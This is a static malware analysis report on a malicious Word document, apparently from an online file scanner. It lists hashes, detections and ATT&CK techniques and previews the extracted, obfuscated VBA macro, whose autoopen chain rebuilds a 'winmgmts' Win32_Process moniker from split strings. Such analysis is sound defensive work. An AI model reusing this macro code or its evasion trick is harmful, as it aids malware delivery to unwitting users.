Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e22419b24abf50f5…

MALICIOUS

Office (OLE)

145.9 KB Created: 2019-05-01 12:11:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 10eb0d359d97da949d83ff24e2e4dbe9 SHA-1: 5e79614386f77db57198b5c22fcc5da31f254b48 SHA-256: e22419b24abf50f5e0895a22b94034dcb8b4d29d89edbb20814947719bd0e20b
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. The macros utilize GetObject and CreateObject to launch the 'Win32_Process' WMI class, a technique often used to execute arbitrary commands or download additional payloads. The obfuscation of 'winmgmts' via string splitting is a common evasion tactic. No specific family could be identified, but the behavior indicates a downloader.

Heuristics 8

  • ClamAV: Doc.Downloader.00536d-6959611-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6959611-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22195 bytes
SHA-256: 2bd5240fffe083c0a83dc44edd1c0e50842afc9bb7c0de2a9ea7835580f81078
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "MADQAZBX"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "zA_GcBBC"
Attribute VB_Base = "0{E5FABED2-5D09-470B-AB68-4DE1B02D2F08}{C296A562-7B4E-476A-8752-2E5E5EBF083F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "lAZoQGB"

Attribute VB_Name = "jGDAwAA"

Attribute VB_Name = "aAAXxQAo"

Attribute VB_Name = "BxABBwA"

Attribute VB_Name = "zCA_U1A"
Attribute VB_Base = "0{860FD737-E3D9-4B12-83F4-26073074266A}{6430A8A0-A2EC-47F2-A4A7-D1F0E89475C9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "rZAxCUB"
Function K_QDQDD(CQCAA_)
   Select Case GAA4xoA
Case 562220402
Minute CInt(172368050 _
- Tan(iDxQk_AA * Cos(vUADA_) + _
612781366 + 928404273))
End Select
   Select Case nAxwCA1
Case 722578661
Minute CInt(217345090 _
- Tan(sAGDBUAA * Cos(IAAAAUA) + _
609068523 + 878158039))
End Select
   Select Case F_AADAQ
Case 504802116
Minute CInt(269409384 _
- Tan(VGABZAQU * Cos(joU1BBk) + _
285758612 + 495812894))
End Select
Set K_QDQDD = CVar(CQCAA_)
   Select Case joXGAQ
Case 642372825
Minute CInt(857527804 _
- Tan(cADGAA * Cos(UCXcAAAA) + _
265654494 + 540685068))
End Select
   Select Case SC4AAow
Case 20847050
Minute CInt(986330889 _
- Tan(Rw4UAA * Cos(nCAGUQ) + _
269843009 + 574981606))
End Select
   Select Case sUBAAAB4
Case 455227288
Minute CInt(253047170 _
- Tan(vA_UAB * Cos(zAcwQwUA) + _
933209543 + 74908986))
End Select
End Function
Sub autoopen()
   Select Case KAAXAZ
Case 642497119
Minute CInt(181703225 _
- Tan(JGxAA4cc * Cos(hAxkGDAc) + _
664103252 + 685957492))
End Select
   Select Case XGG4GD
Case 703799256
Minute CInt(81578945 _
- Tan(U1UAAAQ * Cos(CBAX4Bx) + _
909336882 + 617387229))
End Select
   Select Case A_AACA
Case 900650784
Minute CInt(241955921 _
- Tan(fo1AA_DA * Cos(JUUxAc) + _
573758774 + 653526745))
End Select
Call KwQQAX
   Select Case b4kZ4wD_
Case 705372864
Minute CInt(57839682 _
- Tan(DU_XAA * Cos(aAAGcGZD) + _
830160224 + 203800841))
End Select
   Select Case qDAAA14
Case 395176598
Minute CInt(931474604 _
- Tan(m_cQUA * Cos(iABBBG) + _
272367672 + 425762302))
End Select
   Select Case lUA1A1A
Case 73545898
Minute CInt(435462980 _
- Tan(CAAADAAo * Cos(qAAwXGAA) + _
852514816 + 45840680))
End Select
End Sub


Attribute VB_Name = "FCxXwA"
Function KwQQAX()
On Error Resume Next
   Select Case FDcABxUC
Case 626636184
Minute CInt(531242096 _
- Tan(qoAAA1xA * Cos(cAUADkA) + _
616431418 + 553143818))
End Select
   Select Case DGwAkxA
Case 779757640
Minute CInt(689477681 _
- Tan(qDAAAo_ * Cos(KUAG_B1A) + _
853526271 + 339676429))
End Select
   Select Case bAUBDBG
Case 533436387
Minute CInt(957147201 _
- Tan(rAGoUwQA * Cos(qAQBXG) + _
538258994 + 562243367))
End Select
Set VcAAXDD = K_QDQDD(GetObject("w" + "inmgmts:W" + "in32_Process" + "Sta" + "rtup"))
   Select Case KDXAXDC
Case 201267541
Minute CInt(345682419 _
- Tan(LU_AQ1 * Cos(dCXAxoA) + _
792458517 + 442369741))
End Select
   Select Case QAAAwA4
Case 683066449
Minute CInt(563040337 _
- Tan(oAAADDAQ * Cos(aAAU1UxB) + _
656105962 + 858600647))
End Select
EwU_AA = vbError - vbError
   Select Case l1wAoDD
Case 780749121
Minute CInt(382246454 _
- Tan(HoACUA * Cos(YBAABABw) + _
263297230 + 64874686))
End Select
   Select Case KCAwCAAx
Case 678107768
Minute CInt(396623115 _
- Tan(oBAAUAkA * Cos(dZwQADwB) + _
910934091 + 957431707))
End Select
   Select Case NQAUBU
Case 939437504
Minute CInt(530405962 _
- Tan(oQ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.